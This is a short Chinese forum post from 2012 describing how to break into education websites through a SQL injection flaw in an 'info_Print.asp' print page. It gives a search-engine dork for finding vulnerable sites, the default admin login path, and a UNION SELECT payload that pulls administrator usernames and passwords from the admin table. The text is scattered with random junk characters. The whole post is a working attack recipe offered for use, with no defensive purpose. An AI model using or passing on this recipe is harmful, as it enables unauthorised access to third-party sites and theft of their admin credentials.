教育站打印页面漏洞
: Q- h" M! I- q9 O. o. o' V }) E百度或google搜索 inurl:info_Print.asp?ArticleID=" R/ T# i) N+ f0 X* |
默认后台:/ad_login.asp
U, J# f7 y' q爆管理员密码:4 _, m) E; G6 R3 [+ b/ P
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可# y) l# P+ @$ w
- f! T) f, y* W) _9 t4 _
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin- `+ y7 e* N$ U% `( g2 S$ K
% n% r9 T; ~' q& k作者:佚名 2 d- W* E) D, E, h8 Q
+ f# @+ Q& D1 I2 }/ j, W0 q
0 k/ F$ B; X! A' J4 S! k2 z& D9 T9 R |
发表于 2012-10-31 08:37:31
收藏
支持
反对